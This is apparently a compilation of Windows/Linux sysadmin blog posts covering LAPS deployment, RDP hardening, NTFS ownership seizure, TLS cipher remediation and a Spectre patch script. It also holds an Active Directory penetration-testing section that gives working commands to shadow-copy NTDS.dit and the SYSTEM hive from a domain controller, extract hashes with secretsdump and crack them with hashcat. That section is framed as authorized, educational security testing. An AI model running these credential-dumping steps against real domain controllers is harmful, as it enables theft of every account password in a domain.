How to Implement Local Administrator Password Solution (LAPS) on Windows

Overview

LAPS (Local Administrator Password Solution) is Microsoft's free tool for managing the password of the local administrator account on domain-joined machines: each computer sets its own unique, random password on a schedule and stores it in a confidential Active Directory attribute, so a local password recovered from one host cannot be replayed against the rest of the fleet.

Use case:
– We recently could not log in as the local administrator on a server restored from a Veeam backup, because nobody knew that account's password.
– This exposed the need for centralized management of local administrator accounts and passwords.

Action Plan

The work breaks down into seven steps:

1. Download LAPS.
2. Extend AD Schema
3. Install LAPS Group Policy Files
4. Set Options for LAPS
5. Assign Permissions
6. Push Group Policy to Appropriate OU’s
7. Validation of Installation and Configuration

1. Preparations

  1. Make a full backup of Active Directory (a system state backup of a domain controller, including the schema master, taken before the schema is touched)
  2. Download LAPS
    https://www.microsoft.com/en-us/download/details.aspx?id=46899

2. Extend AD Schema (requires Schema Admins membership; run from a machine where the LAPS installer has put the AdmPwd.PS management module in place)

Import-module AdmPwd.PS
Update-AdmPwdADSchema

3. Install LAPS Group Policy Files
– *.admx goes into the "\Windows\PolicyDefinitions" folder
– *.adml goes into the "\Windows\PolicyDefinitions\[language]" folder
– If the domain uses a central store, copy them to \\<domain>\SYSVOL\<domain>\Policies\PolicyDefinitions instead, or GPMC on other admin workstations will not see the LAPS templates

4. Set options
– GPMC > Computer Configuration > Policies > Administrative Templates > LAPS
– Password settings: set rotation frequency and complexity (the defaults, 14 characters with all character classes and a 30-day maximum age, are a sensible starting point)
– Name of administrator account to manage: leave this Not Configured when you manage the built-in Administrator account, because LAPS finds that account by its well-known RID 500 even after it has been renamed (for example to "localadmin"); set it only when the managed account is a custom local account
– Do not allow password expiration time longer than required by policy: Enabled, so that a machine that has been off the network cannot keep a password beyond the policy maximum; it is forced to rotate at the next policy refresh and AD is brought back in sync
– Enable local admin password management: Enabled (nothing happens until this is set)

5. Assign Permissions
– Create 2 security groups: "LAPS_ReadOnly" and "LAPS_Admins"
– Create a test OU named "Test_OU" and move some test machines into this container
– Grant each computer (SELF) the right to write its own password and expiration attributes; -OrgUnit accepts either the OU name or its distinguished name:

Set-AdmPwdComputerSelfPermission -OrgUnit "Test_OU"

– Delegate read and reset rights to the two groups:

Set-AdmPwdReadPasswordPermission -OrgUnit "Test_OU" -AllowedPrincipals "LAPS_ReadOnly"
Set-AdmPwdResetPasswordPermission -OrgUnit "Test_OU" -AllowedPrincipals "LAPS_Admins"

6. Push GP to Appropriate OUs
– The client-side extension (AdmPwd.dll) must be present and registered on every managed machine. The supported way is to deploy LAPS.x64.msi through GPO software installation; the startup script below does the same two things by hand. It has to run as a computer startup script (which runs as SYSTEM), not a user logon script, because copying into System32 and registering a DLL require administrative rights.
– Script content:

# Startup script: installs the LAPS client-side extension onto the local machine
$admpwdFile = "\\FileSherver01\Software\LAPS\AdmPwd.dll"
Copy-Item -Path $admpwdFile -Destination "$env:windir\System32\AdmPwd.dll" -Force
regsvr32.exe /s "$env:windir\System32\AdmPwd.dll"
gpupdate /force

– Link the GPO carrying this startup script to the correct OU

7. Validation
– Install the LAPS UI on a workstation (or use Get-AdmPwdPassword from the AdmPwd.PS module) > query a machine within the affected OU > verify that a password and an expiration time have been set, and that logging on locally with that password works
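The seven steps above as one script, with the two checks a practitioner wants afterwards: who can actually read the passwords, and which machines have not yet rotated. This is an added example, not code from the original post; the OU distinguished name, the test computer name and the assumption that the two groups already exist are placeholders for this write-up's environment. Run it elevated, as a Schema Admin for the schema step and a Domain Admin for the delegation.

```powershell
# Added example: end-to-end LAPS configuration and validation for one OU.
Import-Module AdmPwd.PS -ErrorAction Stop          # installed with the LAPS management tools
Import-Module ActiveDirectory -ErrorAction Stop

$ou         = 'OU=Test_OU,DC=intranet,DC=kimconnect,DC=com'   # assumed DN of the test OU
$readGroup  = 'LAPS_ReadOnly'
$resetGroup = 'LAPS_Admins'
$testHost   = 'TESTPC01'                                       # assumed test computer name

# Step 2: extend the schema once per forest (re-running only reports that the attributes exist)
Update-AdmPwdADSchema

# Step 5a: let each computer (SELF) write its own ms-Mcs-AdmPwd / ms-Mcs-AdmPwdExpirationTime
Set-AdmPwdComputerSelfPermission -OrgUnit $ou

# Step 5b: delegate read and forced reset to the two groups
Set-AdmPwdReadPasswordPermission  -OrgUnit $ou -AllowedPrincipals $readGroup
Set-AdmPwdResetPasswordPermission -OrgUnit $ou -AllowedPrincipals $resetGroup

# Check 1: every principal holding "All Extended Rights" on the OU can read the password attribute,
# whether or not you delegated it on purpose. Anything that is not LAPS_ReadOnly or a tier-0
# admin group should have that right removed.
Find-AdmPwdExtendedRights -Identity $ou |
    Select-Object ObjectDN, @{ n = 'Holders'; e = { $_.ExtendedRightHolders -join ', ' } }

# Check 2 (step 7): a machine that has processed the GPO carries an expiration stamp; one without
# it has not installed or run the client-side extension yet.
Get-ADComputer -SearchBase $ou -Filter * -Properties 'ms-Mcs-AdmPwdExpirationTime' |
    ForEach-Object {
        $raw = $_.'ms-Mcs-AdmPwdExpirationTime'
        [pscustomobject]@{
            Computer = $_.Name
            Expires  = if ($raw) { [DateTime]::FromFileTime([int64]$raw) } else { 'not set (CSE not applied yet)' }
        }
    }

# Read one password the way a LAPS_ReadOnly member would (it comes back in clear text) ...
Get-AdmPwdPassword -ComputerName $testHost | Select-Object ComputerName, Password, ExpirationTimestamp

# ... then force that machine to rotate at its next policy refresh, so a viewed password does not linger
Reset-AdmPwdPassword -ComputerName $testHost -WhenEffective (Get-Date)
```

Reset-AdmPwdPassword only moves the expiration time into the past; the new password appears after the client next refreshes policy (gpupdate /force on the machine, or the next 90-minute cycle).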

Impacts Assessment:

User impact: none expected

Systems Internal Impacts:

New Objects:
– 2 new security groups are added: “LAPS_ReadOnly” and “LAPS_Admins”
– 1 new OU named “Test_OU” is created
– 1 new Group Policy named “LAPS” will be made

A computer startup script (content as shown in step 6) will be applied to computers located inside "Test_OU"; it copies AdmPwd.dll into System32 and registers it.

Effects of the "Update-AdmPwdADSchema" command:
– The AD schema is extended with 2 new attributes (the password attribute is marked confidential, so only principals with Control Access/All Extended Rights on the computer object can read it):
— cn=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=intranet,DC=kimconnect,DC=com
— cn=ms-Mcs-AdmPwdExpirationTime,CN=Schema,CN=Configuration,DC=intranet,DC=kimconnect,DC=com
– This 1 existing schema class is modified to carry them:
— cn=computer,CN=Schema,CN=Configuration,DC=intranet,DC=kimconnect,DC=com
– Test machines, and any machine the GP is later applied to, get one DLL added under C:\Windows\System32: AdmPwd.dll

Risks Analysis:

This is a MEDIUM risk item for these reasons:
– The schema extension is permanent; a change to the AD schema is normally rated "High". Because this is a Microsoft product extending a Microsoft product, clean integration is expected, so this sub-item is downgraded to "Medium".
– Domain Admins, and any other principal holding "All Extended Rights" on the computer objects, can read the local passwords of every targeted machine. Audit those holders (Find-AdmPwdExtendedRights) and remove rights that were not delegated on purpose, and enable auditing of password reads. This sub-item is "Medium".
– No user-perceivable effect. This sub-item is "Low".

Validation:

– “Step 7” in the execution plan provides validation on whether LAPS has been successfully applied toward test Windows machines inside the “TEST_OU”

Roll-back Plan:

– Unlinking the GPO and removing the client-side extension stops password management, and the groups, OU and GPO can be deleted. The schema extension itself is not undone by an AD restore: new attributes can only be deactivated, never deleted, and reverting to a pre-extension state would mean a full forest recovery. This is why the schema change is treated as permanent above.

Securing Windows Remote Desktop Services

secpol.msc > Local Policies > User Rights Assignment > double-click "Allow log on through Remote Desktop Services" > remove Administrators and Remote Desktop Users > add a dedicated group and/or named users. Confirm that the group you add contains the account you administer from before closing the dialog, or you lock yourself out of RDP on that host.

gpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security > change these settings:
– Set client connection encryption level = High (128-bit; this only matters for the legacy RDP security layer, since with the TLS layer below the negotiated TLS cipher suite decides)
– Require secure RPC communication = Enabled
– Require use of specific security layer for remote (RDP) connections = SSL (the listener authenticates itself with a certificate over TLS instead of the weaker RDP security layer)
– Require user authentication for remote connections by using Network Level Authentication = Enabled (the client must authenticate before a session is created, which removes the pre-authentication attack surface of the logon screen)
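Reading the settings back is the only way to know the policy actually landed. The following is an added example (not from the original post) that reports the effective value of each setting above on the local host and lists who still holds the RDP logon right; it assumes the GPO or secpol changes have been applied, and that policy keys take precedence over the per-listener WinStation keys, which is how Windows resolves them.

```powershell
# Added example: verify RDP hardening on the local host.
function Get-RdpHardeningState {
    $policy  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    $station = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

    # Policy value wins when present; otherwise fall back to the listener's own value
    function Get-Effective([string]$name) {
        $p = (Get-ItemProperty -Path $policy  -Name $name -ErrorAction SilentlyContinue).$name
        if ($null -ne $p) { return $p }
        return (Get-ItemProperty -Path $station -Name $name -ErrorAction SilentlyContinue).$name
    }

    [pscustomobject]@{
        NlaRequired        = (Get-Effective 'UserAuthentication') -eq 1   # 1 = NLA required
        SecurityLayerIsTls = (Get-Effective 'SecurityLayer') -eq 2        # 0 = RDP, 1 = Negotiate, 2 = TLS ("SSL")
        EncryptionHigh     = (Get-Effective 'MinEncryptionLevel') -ge 3   # 1 Low, 2 Client compatible, 3 High, 4 FIPS
        # "Require secure RPC communication" exists only as a policy value
        SecureRpcRequired  = ((Get-ItemProperty -Path $policy -Name 'fEncryptRPCTraffic' -ErrorAction SilentlyContinue).fEncryptRPCTraffic) -eq 1
    }
}

function Get-RdpLogonRightHolders {
    # secedit is the built-in way to dump user rights; SIDs are written with a leading '*'
    $inf = Join-Path $env:TEMP 'secpol-export.inf'
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $line = Get-Content -Path $inf | Where-Object { $_ -match '^SeRemoteInteractiveLogonRight' } | Select-Object -First 1
    Remove-Item -Path $inf -ErrorAction SilentlyContinue
    if (-not $line) { return @() }                 # right assigned to nobody at all
    ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
        $id = $_.Trim()
        if ($id.StartsWith('*')) {
            # translate the SID to an account name for readability; keep the SID if that fails
            try { (New-Object System.Security.Principal.SecurityIdentifier($id.Substring(1))).Translate([System.Security.Principal.NTAccount]).Value }
            catch { $id }
        } else { $id }
    }
}

Get-RdpHardeningState
$holders = Get-RdpLogonRightHolders
"Allowed to log on through RDP: $($holders -join ', ')"
# The two defaults the procedure above removes
$holders | Where-Object { $_ -match 'Administrators$|Remote Desktop Users$' } |
    ForEach-Object { Write-Warning "Default group still holds the RDP logon right: $_" }
```

All four booleans should read True and the warning should not fire. If NlaRequired is False while the policy says otherwise, the GPO has not refreshed yet; run gpupdate /force and check again.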

Penetration Testing of Active Directory

Foreword: the following information is intended as educational content and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions for evasive techniques, as that is against the moral character of ethical hacking.

1. Grab NTDS.dit and the SYSTEM hive from a domain controller (requires local administrator rights on the DC; the SYSTEM hive holds the boot key that decrypts the hashes stored in NTDS.dit)

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\
reg save HKLM\SYSTEM C:\systemhive

Use the shadow copy volume name that vssadmin prints; it is VolumeShadowCopy1 only on a host with no earlier snapshots. The reg save line is an alternative way to obtain the SYSTEM hive without going through the shadow copy.

2. Extract the hashes using impacket (https://github.com/SecureAuthCorp/impacket)

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python3 -m pip install .
secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM LOCAL -outputfile pentest-ntlm-extract

LOCAL tells secretsdump to parse the copied files instead of authenticating to a host, so no credential options are needed; the NT hashes land in pentest-ntlm-extract.ntds, one account per line in user:rid:lmhash:nthash::: form.

3. Crack the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat (https://hashcat.net/wiki)

# -m 1000 = NTLM, -a 0 = wordlist attack (~/pentest.txt is the wordlist), --username because the secretsdump lines carry account names
hashcat -m 1000 -w 3 -a 0 -p : --session=all --username -o ~/pentest/pentest.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds ~/pentest.txt --potfile-path ~/pentest/hashcat.pot
# Print everything already cracked, user by user, from the same pot file
hashcat -m 1000 -w 3 -a 0 -p : --session=all --username --show -o ~/pentest/pentest_1.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds --potfile-path ~/pentest/hashcat.pot

  4. Plain PowerShell
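Before feeding the whole .ntds file to a GPU, it pays to read it: some of the worst findings need no cracking at all. The following is an added example (not from the original post) that triages a secretsdump output file, flagging accounts whose NT hash is the empty-password hash, accounts that still have an LM hash stored (LM storage was never disabled), and groups of accounts sharing one NT hash (the same password on several accounts). The sample lines are constructed for this illustration; only the two "empty" constants are real values, the other hash values are placeholders.

```powershell
# Added example: triage a secretsdump ".ntds" dump before cracking.
$EmptyLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM hash of an empty/absent password
$EmptyNt = '31d6cfe0d16ae931b73c59d7e0c089c0'   # NT hash of an empty password

function Read-NtdsDump([string[]]$Lines) {
    foreach ($line in $Lines) {
        # Format: [domain\]user:rid:lmhash:nthash:::[ (status=Enabled|Disabled)]
        # Password-history entries (from -history) are named <user>_history<N>.
        if ($line -match '^(?<user>[^:]+):(?<rid>\d+):(?<lm>[0-9a-fA-F]{32}):(?<nt>[0-9a-fA-F]{32}):::(?<tail>.*)$') {
            $user = $Matches.user; $rid = [int]$Matches.rid
            $lm = $Matches.lm.ToLower(); $nt = $Matches.nt.ToLower(); $tail = $Matches.tail
            [pscustomobject]@{
                User       = $user
                Rid        = $rid
                Lm         = $lm
                Nt         = $nt
                IsHistory  = $user -match '_history\d+$'
                IsDisabled = $tail -match 'Disabled'
                IsMachine  = $user.EndsWith('$')
            }
        }
    }
}

function Get-NtdsFindings([object[]]$Accounts) {
    # Only live, enabled user accounts belong in the cracking queue
    $live = @($Accounts | Where-Object { -not ($_.IsHistory -or $_.IsDisabled -or $_.IsMachine) })
    [pscustomobject]@{
        Accounts        = $live.Count
        EmptyPassword   = @($live | Where-Object { $_.Nt -eq $EmptyNt } | ForEach-Object User)
        LmHashStored    = @($live | Where-Object { $_.Lm -ne $EmptyLm } | ForEach-Object User)
        SharedPasswords = @($live | Group-Object Nt | Where-Object Count -gt 1 |
                            ForEach-Object { [pscustomobject]@{ Nt = $_.Name; Users = @($_.Group.User) } })
    }
}

# Constructed sample (hash values other than the empty constants are placeholders)
$sample = @(
    'intranet.kimconnect.com\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)'
    'intranet.kimconnect.com\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)'
    'intranet.kimconnect.com\jdoe:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Enabled)'
    'intranet.kimconnect.com\legacyapp:1110:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)'
    'intranet.kimconnect.com\olduser:1111:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Disabled)'
    'intranet.kimconnect.com\WS01$:1200:aad3b435b51404eeaad3b435b51404ee:0f7b3c2d9a8e1f4b5c6d7e8f9a0b1c2d::: (status=Enabled)'
    'intranet.kimconnect.com\jdoe_history0:1108:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'
)
$findings = Get-NtdsFindings (Read-NtdsDump $sample)
$findings | Format-List   # 4 live accounts; EmptyPassword = jdoe; LmHashStored = legacyapp; one NT hash shared by 3 accounts

# Real run:
# Get-NtdsFindings (Read-NtdsDump (Get-Content ~/pentest/pentest-ntlm-extract.ntds))
```

Use -user-status on secretsdump so that disabled accounts carry the status suffix the parser looks for; without it every account is treated as enabled. A shared hash between a privileged account and a service account is the finding to report first, since cracking either one yields both.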

Microsoft SQL Server Error 18456

In a properly managed environment, the security team tracks the server logs for failed login events. Here is an example of such a report:

Looking at Windows’ log [image missing, whatever…]

Checking SQL server for the target user

Granting permissions

Granting connect permissions

The screenshots above are just that: screenshots. The actual resolution for this error is different from the assumptions they suggest; search this blog further if you are looking for the fix for your identical error code and state.

File Access Control

System Engineers must follow the security principle of authentication, authorization, and accounting (AAA) as the framework for controlling access to information technology resources. Authentication and accounting are handled by Active Directory; the administrative element, authorization, is illustrated below.

Identify target files and/or directories

It is necessary to specify the target folders and any child items that the original requester has been authorized by management to access. For example, here is a view of a test folder on the network:

Ensure that “File Permission Admins” Group has Full access

"File Permission Admins" will most likely already have access to network directories. Check this by selecting a file or folder >> right-click the item >> Properties >> Security tab, which gives this view:

  • Seize Ownership

In rare instances an object is inaccessible because "File Permission Admins" has been removed from its NTFS permissions list. This shows up as the message "You do not have permission to view or edit this object's permission settings" when a member of that group opens it.

To resolve this issue, the Engineer would click on the Advanced button >> click on the Owner tab

Click on the Edit button >> highlight Administrators group >> put a check mark next to “Replace owner on subcontainers and objects” >> click OK

Click OK on the next prompt

  • Grant “File Permission Admins” Full control

Once ownership has been seized, the NTFS permissions list can be edited to give "File Permission Admins" control of the object: right-click the object >> Properties >> Security tab >> Edit >> add "File Permission Admins" with Full control >> OK

Please be advised that the procedure above is only effective on the immediate object and on those children that still inherit from it. Any item inside the parent folder whose inheritance has been disabled keeps its own ACL and continues to deny members of File Permission Admins, which produces this error:

If this happens, repeat the take-ownership steps on those items, manually or by script, and then complete the task.

Once the task is completed, System Engineers reroute the ticket back to the User Admins queue so that group can proceed with enabling access for the original requester.
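The same procedure from the command line, so it can be scripted for a tree with many inheritance breaks. This is an added example, not part of the original post; the share path and the domain-qualified group name are assumptions, and it must run elevated as a member of the local Administrators group, because seizing ownership relies on the SeTakeOwnershipPrivilege that group holds.

```powershell
# Added example: seize ownership, grant the admins group Full control, then verify the whole tree.
$target = '\\FileServer01\Shares\Finance'      # assumed share path
$group  = 'INTRANET\File Permission Admins'    # assumed domain-qualified group name

# 1. Take ownership for Administrators on the folder and everything beneath it (/R recurse, /D Y answers
#    the prompt for directories you cannot list). Ownership is granted even where no ACE allows access.
takeown /F $target /A /R /D Y | Out-Null

# 2. Grant Full control, inherited by subfolders (CI) and files (OI), recursively (/T), continuing past
#    errors (/C). Because step 1 made Administrators the owner of every child, this also reaches items
#    whose inheritance was disabled: an owner can always rewrite the DACL.
icacls $target /grant "${group}:(OI)(CI)F" /T /C | Out-Null

# 3. Verify: list every child that still lacks an Allow FullControl ACE for the group
function Get-ItemsMissingFullControl([string]$Root, [string]$Principal) {
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl
    Get-ChildItem -Path $Root -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) {
                [pscustomobject]@{ Path = $_.FullName; Reason = 'ACL unreadable' }
                return
            }
            $ok = $acl.Access | Where-Object {
                $_.IdentityReference.Value -eq $Principal -and
                $_.AccessControlType -eq 'Allow' -and
                (($_.FileSystemRights -band $full) -eq $full)
            }
            if (-not $ok) { [pscustomobject]@{ Path = $_.FullName; Reason = 'no FullControl ACE' } }
        }
}
Get-ItemsMissingFullControl -Root $target -Principal $group
```

An empty result from step 3 means the User Admins team can now delegate access to the requester without hitting the inheritance error above. Items reported as "ACL unreadable" are usually paths longer than 260 characters, which Get-Acl cannot open on older PowerShell versions; icacls handles them.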

Linux: Remediate SSL Weak Cipher Suites

Description

The remote host supports the use of SSL ciphers that offer weak encryption.

Note: This is considerably easier to exploit if the attacker is on the same physical network.

Output
Here is the list of weak SSL ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

DES-CBC-SHA Kx=RSA Au=RSA Enc=DES-CBC(56) Mac=SHA1

The fields above are :

{OpenSSL ciphername}
Kx={key exchange}
Au={authentication}
Enc={symmetric encryption method}
Mac={message authentication code}
{export flag}

Source: Tenable.IO

Solution


Reconfigure the affected application, if possible, to avoid the use of weak ciphers. On Apache httpd (RHEL/CentOS layout), edit the SSL virtual host configuration:

sudo vim /etc/httpd/conf.d/ssl.conf

… and set the protocol and cipher directives to:

SSLProtocol -all -SSLv2 -SSLv3 -TLSv1 +TLSv1.1 +TLSv1.2

SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 !EECDH+aRSA+RC4 EECDH EDH+aRSA !RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS !EDH-RSA-DES-CBC3-SHA !ECDHE-RSA-DES-CBC3-SHA !DES-CBC3-SHA !ECDHE-RSA-RC4-SHA !RC4-MD5 !RC4-SHA"

The "!LOW" exclusion alone removes the 56-bit DES-CBC-SHA suite the scanner reported; the rest of the string prefers forward-secret ECDHE suites with AES-GCM and bars RC4, 3DES, MD5, export and anonymous ciphers. Add SSLHonorCipherOrder on so the server's preference wins over the client's, run apachectl configtest, and restart httpd for the change to take effect. TLS 1.1 has since been deprecated along with TLS 1.0 (RFC 8996); on a current build drop +TLSv1.1 as well and add +TLSv1.3 where the OpenSSL version supports it.

For Windows, follow this script: https://kimconnect.com/powershell-windows-2016-pristine-image
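After the restart, verify from a client rather than trusting the config file. The following is an added example (not from the original post) that attempts a handshake at each protocol version and reports the negotiated cipher and key length; after the remediation above SSLv3 and TLS 1.0 must fail and TLS 1.2 must succeed with a key of more than 64 bits. The host name is an assumption, and certificate validation is deliberately skipped because only protocol and cipher negotiation is under test here.

```powershell
# Added example: probe which TLS versions a server accepts and what it negotiates.
function Test-TlsProtocol {
    param(
        [string]$HostName,
        [int]$Port = 443,
        [System.Security.Authentication.SslProtocols]$Protocol
    )
    $tcp = $null; $ssl = $null
    try {
        $tcp = New-Object System.Net.Sockets.TcpClient($HostName, $Port)
        # Accept any certificate: we are testing negotiation, not trust
        $noCheck = [System.Net.Security.RemoteCertificateValidationCallback]{ $true }
        $ssl = New-Object System.Net.Security.SslStream($tcp.GetStream(), $false, $noCheck)
        # Offer exactly one protocol version so a success proves the server accepts it
        $ssl.AuthenticateAsClient($HostName, $null, $Protocol, $false)
        [pscustomobject]@{
            Offered    = $Protocol
            Negotiated = $true
            Version    = $ssl.SslProtocol
            Cipher     = $ssl.CipherAlgorithm
            KeyBits    = $ssl.CipherStrength
            KeyExch    = $ssl.KeyExchangeAlgorithm
            Weak       = $ssl.CipherStrength -le 64      # Tenable's "Low Strength" threshold
        }
    } catch {
        [pscustomobject]@{
            Offered = $Protocol; Negotiated = $false; Version = $null
            Cipher = $null; KeyBits = 0; KeyExch = $null; Weak = $false
        }
    } finally {
        if ($ssl) { $ssl.Dispose() }
        if ($tcp) { $tcp.Dispose() }
    }
}

$server = 'www.kimconnect.com'   # assumed target
'Ssl3', 'Tls', 'Tls11', 'Tls12' |
    ForEach-Object { Test-TlsProtocol -HostName $server -Protocol $_ } |
    Format-Table -AutoSize
```

Two caveats: a Negotiated = False row proves only that this client and server could not agree, and a client whose own OS has SSLv3 or TLS 1.0 disabled fails those rows regardless of the server; and SslStream reports the negotiated suite only, so for a full cipher-by-cipher inventory use openssl s_client -cipher or nmap --script ssl-enum-ciphers against the host.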

Security Updates for Windows 10 / Windows Server 2016 / Windows Server 2019 (March 2019) (Spectre) (Meltdown) (Foreshadow)

Description
The remote Windows host is missing a security update. It is, therefore, missing microcode updates to address the following vulnerabilities:

– Spectre Variant 3a (CVE-2018-3640: Rogue System Register Read (RSRE)).

– Spectre Variant 4 (CVE-2018-3639: Speculative Store Bypass (SSB))

– L1TF (CVE-2018-3620, CVE-2018-3646: L1 Terminal Fault)
 
Solution
Microsoft has released security updates for Windows 10, Windows Server 2016 and Server 2019.

I’ve written two functions to check for and remediate this finding. The first version compared version strings as dot-stripped doubles, called an undefined download helper and passed wusa.exe a -kb switch it does not have; the version below fixes those defects and refuses to install a package whose Authenticode signature does not validate, since the download is plain HTTP.

$fixList = New-Object System.Collections.Generic.List[string]

function checkSpectreVulnerability{
<#
# Alternative checks for the hotfix itself
Get-HotFix -Id "KB4346087"
dism /online /get-packages | findstr KB4346087
#>
    $patchedVersion = [version]"10.0.14393.2842"   # mcupdate_genuineintel.dll as shipped in KB4346087
    $dll = Get-Item "$env:windir\System32\mcupdate_genuineintel.dll" -ErrorAction SilentlyContinue
    if (-not $dll){ "Intel microcode DLL not present (AMD host or file missing); nothing to compare."; return }
    # [version] compares each dotted field numerically, which the dot-stripping trick did not
    $actualVersion = [version](($dll.VersionInfo.ProductVersion -split '\s')[0])
    "$actualVersion vs $patchedVersion"
    if ($actualVersion -lt $patchedVersion){
        "Spectre meltdown vulnerability detected."
        $fixList.Add('fixSpectreVulnerability')
    }
    else{ "No Spectre meltdown vulnerability detected." }
}

function fixSpectreVulnerability{
    # KB4346087: http://www.catalog.update.microsoft.com/Search.aspx?q=KB4346087
    $spectreDownload = "http://download.windowsupdate.com/c/msdownload/update/software/updt/2019/02/windows10.0-kb4346087-v3-x64_d108fe2af745ebf98bfb0548c905c07715492941.msu"
    $spectreDestination = "C:\Temp\kb4346087-v3-x64.msu"
    New-Item -ItemType Directory -Path (Split-Path $spectreDestination) -Force | Out-Null
    (New-Object System.Net.WebClient).DownloadFile($spectreDownload, $spectreDestination)

    # Only install a package that carries a valid Microsoft Authenticode signature
    $sig = Get-AuthenticodeSignature -FilePath $spectreDestination
    if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft'){
        throw "Refusing to install $spectreDestination (signature status: $($sig.Status))"
    }
    # wusa.exe takes the path of the .msu, not a KB number
    Start-Process -FilePath wusa.exe -ArgumentList "`"$spectreDestination`" /quiet /norestart" -Wait

<#
# DISM method
mkdir c:\temp\KB4346087
expand -F:* $spectreDestination c:\temp\KB4346087
DISM.exe /Online /Add-Package /PackagePath:c:\temp\KB4346087\Windows10.0-KB4346087-v3-x64.cab /NoRestart
#>
}

checkSpectreVulnerability
foreach ($fix in $fixList){ & $fix }

Output

PS C:\Users\test\Desktop\unit-test.ps1
10.0.14393.2842 vs 10.0.14393.2842
No Spectre meltdown vulnerability detected.

KB4346087 includes mcupdate_genuineintel.dll version 10.0.14393.2842. Manual installation would cause this popup to occur if the script above has already been triggered:


Here’s the result of a query of applied KB4346087 on this test system:

Example of system without KB4346087 installed (empty result)

PS C:\Users\test> dism /online /get-packages | findstr -i "KB4346087"
PS C:\Users\test>

PS C:\Users\test> Get-HotFix -Id "KB4346087"
Get-HotFix : Cannot find the requested hotfix on the 'localhost' computer. Verify the input and run the command again.
At line:1 char:1
+ Get-HotFix -Id "KB4346087"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException
+ FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand

Example of pending install (no install date):

PS C:\Users\test> dism /online /get-packages | findstr -i "KB4346087"
Package Identity : Package_for_KB4346087~31bf3856ad364e35~amd64~~10.0.3.0

PS C:\Users\test> Get-HotFix -Id "KB4346087"

Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KOMPUTER Update KB4346087

Confirmation of the pending install (State : Install Pending, no install time):

PS C:\Users\test> Dism.exe /Online /Get-Packages

Deployment Image Servicing and Management tool
Version: 10.0.14393.0

Image Version: 10.0.14393.2457

Packages listing:

Package Identity : Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Foundation
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Basic-en-gb-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:40 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Basic-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:41 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Handwriting-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:46 PM

Package Identity : Microsoft-Windows-LanguageFeatures-OCR-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-LanguageFeatures-Speech-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-LanguageFeatures-TextToSpeech-en-us-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/2/2018 6:47 PM

Package Identity : Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : OnDemand Pack
Install Time : 2/4/2019 10:35 PM

Package Identity : Microsoft-Windows-Security-SPP-Component-SKU-ServerStandard-GVLK-Package~31bf3856ad364e35~amd64~~10.0
.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 2/2/2018 7:27 PM

Package Identity : Microsoft-Windows-Server-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~10.0.14393.0
State : Installed
Release Type : Language Pack
